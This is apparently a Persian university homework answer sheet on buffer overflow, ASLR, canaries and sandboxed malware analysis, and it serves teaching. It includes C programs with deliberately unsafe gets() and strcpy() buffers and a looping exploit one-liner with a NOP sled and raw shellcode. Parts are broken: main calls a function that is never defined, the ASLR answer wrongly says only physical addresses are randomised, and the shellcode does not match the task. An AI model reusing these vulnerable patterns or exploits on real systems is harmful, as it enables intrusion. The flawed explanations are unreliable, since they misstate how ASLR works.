پاسخ تمرین سری سوم امنیت شبکه های کامپیوتری-دانشگاه شهید بهشتی-ترم دوم ۹۳-۹۴
به نام خدا
پاسخ تمرینات Advanced Buffer Overflow & SandBoxing & Software Fault Isolation
استاد: دکتر مقصود عباسپور
کمک تدریس: جواد زندی
لطفا در ارسال تمرینات خود به نکات مهم زیر توجه داشته باشید:
1- مهلت این سری تمرینات تا ۸اردیبهشت قبل از کلاس استاد درس میباشد.
2- نحوه تحویل تمرینات شما به دو صورت میتواند باشد:
الف) تمریناتی که به صورت سوالات تحلیلی و تعریفی و مسله ای است به صورت خوانا دستی روی کاغذ بنویسید و برگه خود را تحویل اینجانب دهید. در مورد برگههای تمرین خود دقت داشته باشید که حتما نام و شماره دانشجویی را بالای برگهی خود بنویسید.
3- همهی دوستان دقت داشته باشند که تصمیمگیری در مورد تمرینات یکسان برعهده استاد درس خواهد بود و حلتمرین موظف به نوشتن گزارش تخلف و ارایه آن به استاد درس میباشد.
4- از آنجایی که پاسخهای شما بادقت صحیحمیشود، ایدههایخلاقانه و پاسخهای هوشمندانه در حلسوالات طبیعتا نمرهای فراتر از تمرین دارد.
5- در مورد تمرینات این سری تحویلها با کمی جزیات همراه میباشد. لطفا در ارایه تمرینات خود به آنها توجه نمایید. این جزیات در خود سوال حتما قید خواهد شد.
برای
مشاهده پاسخ
ها به ادامه
مطلب بروید.
سوالات مفهومی:
1- ابتدا تکنیک SandBox را در یک خط شرح دهید و سپس بگویید منظور از قابلیت sandbox در آنتی ویروسهای رایجی مثل Kaspersky، Avast و… چیست؟ به عبارت دیگر، این قابلیت چه امکانی به این آنتی ویروسها میدهد؟
پاسخ: به اسلایدهای درس مراجعه شود.
2- در ابتدا توضیح دهید که یک SandBox چگونه طراحی و پیادهسازی میشود(کلیات را قید کنید). حال که ساختار SandBox را میشناسید به عنوان مهندس امنیت اطلاعات به پرسش زیر پاسخ دهید:
– توسط SandBox مشاهده شده که برنامه رفتار خوبی از خود نشان داده است، آیا میتوان نتیجه گرفت که برنامه مورد آزمایش مخرب نیست؟ پاسخ: خیر نمیتوان. چون برنامههای مخرب حرفهای قادر به تشخیص محیط sandbox هستند. -اگر پاسخ شما خیر است باید توضیح دهید: ۱-چطور امکانپذیر است؟ ۲-پس علت استفاده از SandBox چیست؟ پاسخ: چون فایلهای مخرب با تشخیص محیط sandbox بخش مخرب خود را اجرا نمیکنند تا sandbox در تشخیص دچار اشتباه شود. علت استفاده در این است که اگر مخرب تشخیص داده شود، حتما مخرب است، ولی اگر مخرب تشخیص داده نشود، لزوما پاک نیست و فایلهایی که مخرب نباشند جزو دستهی ناشناخته قرار میگیرند، نه پاک و سالم.
-اگر بلی است باید توضیح دهید چرا چنین اعتمادی درست است؟
3- در کلاس حلتمرین به تفصیل در مورد روشهای آنالیز static و dynamic صحبت کردیم، اکنون بگویید که:
i. چه زمانی یک تحلیلگر روش static در کار خود(static analysis) ناکام مانده و به سراغ روش dynamic میرود؟ پاسخ: زمانی که فایل مخرب بخشهایی از کد خود را رمزنگاری کند. در این صورت فقط در زمان اجرا میتوان به عملکرد واقعی برنامه پس برد.
ii. بهنظر شما چرا تحلیلگر روش static برای تحلیل dynamic از SandBox استفاده میکند؟ آیا گزینههای بهتری وجود دارد؟ پاسخ: بهطور کلی برای جلوگیری از آسیبهای احتمالی فایلهای مخرب هیچگاه آنها را در محیطی که دادههای ارزشمندی دارد، اجرا نمیکنند. به طور کلی همیشه در سیستمی اجرا میکنند که همهی آسیبهای فایل مخرب به حداقل ممکن برسد.
4- ابزارهای زیر همگی برای محدود کردن خطاهای نرمافزارها(Software Fault Isolation) استفاده میشود:
i. Chroot
ii. jail
iii. Ptrace
iv. Systrace
v. Strace
vi. Sandbox
برای هرکدام توضیح دهید آنها چه دسته از خطاها را مهار کرده و ایراد هرکدام در چه چیزی میباشد؟
پاسخ: به اسلایدهای درس مراجعه شود.
5- در مورد تکنیک روش canary در کلاس درس آشنا شدید. تکنیک canary اصولا به چند دسته تقسیم میشود؟ هرکدام را شرح دهید. همچنین بگویید:
i. آیا حملاتی وجود دارد که بتواند تکنیک canary را دور بزند؟ اگر وجود دارد راههای دفاع در برابر آنها را ذکر کنید.
ii. آیا حملاتی وجود دارد که تکنیک canary نتواند جلوی آنها را بگیرد؟
سوالات عملی:
توجه: برای سریعتر انجامشدن تمرینات عملی بهتر است به نکات زیر توجه داشته باشید:
o در مورد تمرین ASLR حتما باید ابتدا دستور زیر را اجرا کرده تا ASLR سیستم شما فعال گردد:
echo 1 > /proc/sys/kernel/randomize_va_space
در صورتی که تسلط کافی برروی این روش ندارید میتوانید ویدیوی زیر را که از سایت یوتیوب انتخابشده است مشاهده بفرمایید تا مشکل شما حل شود.
o در مورد تمرینات SandBox باید به نکات زیر توجه کنید:
دستهای از SandBox ها تجاری هستند(Node32, Kaspersky, …) و شما برای استفاده از آنها مجبور نیستید یک نسخه از آنها را نصب نمایید. میتوانید با مراجعه به سایت تحلیل ویروس جامع مراجعه فرمایید.
دستهای از SandBox ها متنباز و رایگان است. شما میتوانید یک نسخه از آنها را (مثلا cuckoo) با استفاده از راهنمای آن برروی سیستم خودتان نصب بفرمایید(که این مورد توصیه میشود.) یا اینکه از نسخههای آنلاین آنها استفاده نمایید.
o برنامههای قابل اجرای موجود در پیوست را اکیدا توصیه میکنم روی سیستم خودتان اجرا ننماید. آنها به شدت خطرناک هستند. در صورتی که این تذکر را نادیده بگیرید، عواقب آن به عهده خودتان خواهد بود.
1- در این سوال حتما ابتدا ASLR را با مقدار 1 فعال کرده و سپس به سوال زیر پاسخ دهید:
#include <time.h>
#include <stdlib.h>
void stringMirorring();
void runOnExploit();
int main () {
stringMirorring ();
return 0;
}
void FeedMeInput() {
char buffer[8];
gets(buffer);
puts(buffer);
}
void runOnExploit () {
printf(“You have exploit me successfully!\n”);
}
I. (بدون دستکاری کد برنامه) برای برنامهی فوق ورودی طراحی نمایید که تابع runOnExploit اجرا شود.
II. برای تابع فوق ورودی طراحی نمایید که تابع exit اجرا شود.
III. آیا میتوانید ورودی طراحی نمایید که اول تابع runOnExploit اجرا شود و سپس تابع اصلی exit اجرا شود؟
پاسخ: با فعالکردن روش ASLR نمی توان جلوی این دسته از حملات را گرفت. بنابراین پاسخ این سوال مانند سوال تمرین قبل میباشد. چراکه آدرس تابع runOnExploit به صورت منطقی بوده و توسط حملهکننده هم به صورت منطقی به برنامه داده میشود(آدرسهای منطقی تحت تاثیر ASLR قرار نمیگیرند.) بنابراین نکته سوال در این بود که فقط آدرسهای فیزیکی تحتتاثیر ASLR قرار میگیرند.
2- حال که نوشتن shellcode را آموختهاید، اکنون shellcode ای بنویسید که برنامهی موجود در مسیر /bin/sh را اجرا نماید(بنابراین باید از فراخوانی execve استفاده نمایید). بعد از اینکه shellcode را نوشتید ASLR سیستمتان را با مقدار 1 مقداردهی کرده و سپس برنامهی زیر را توسط shellcode خودتان exploit کنید.
int main (int argc, char *argv[]) {
char buffer [10];
if (argc>1)
strcpy (buffer, argv[1]);
return 0;
}
while true; do ./a.out python -c ‘print “0”*22 + “\xf0\xf5\xff\xbf” + “\x90″*100000 + “\xbb\x04\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80″‘; done
3- برنامهی شمارهی سه را از سیستم درسافزار از قسمت پیامهای شخصی خودتان دانلود کنید. این برنامه را درون SandBox اجرا کنید و سپس اطلاعات زیر را استخراج نماید.
o برنامه مخرب است یا نه؟
o با چه فایلهایی سروکار دارد؟ (لیست فایلهای بازشده توسط برنامه)
o کدام رجیسترها را در رجیستری ویندوز (میتوانید تغییرات را با regedit ببینید) تغییر میدهد؟
o از چه کتابخانههایی(.dll) استفاده میکند؟
o آیا فعالیت شبکه دارد؟ اگر دارد به چه domain(یا ip) اطلاعات میفرستد؟ اگر مدعی هستید اطلاعتی ارسال میکند آنها را ضبط کنید و در پیوست پاسخ تمرین قرار دهید.
o برنامهی فوق درواقع چه کاری انجام میدهد؟
4- برنامهی چهار سه را از سیستم درسافزار از قسمت پیامهای شخصی خودتان دانلود کنید. این برنامه را درون SandBox اجرا کنید و سپس اطلاعات زیر را استخراج نماید.
o برنامه مخرب است یا نه؟
o با چه فایلهایی سروکار دارد؟ (لیست فایلهای بازشده توسط برنامه)
o کدام رجیسترها را در رجیستری ویندوز (میتوانید تغییرات را با regedit ببینید) تغییر میدهد؟
o از چه کتابخانههایی(.dll) استفاده میکند؟
o آیا فعالیت شبکه دارد؟ اگر دارد به چه domain(یا ip) اطلاعات میفرستد؟ اگر مدعی هستید اطلاعتی ارسال میکند آنها را ضبط کنید و در پیوست پاسخ تمرین قرار دهید.
o برنامهی فوق درواقع چه کاری انجام میدهد؟
Trackback from your site.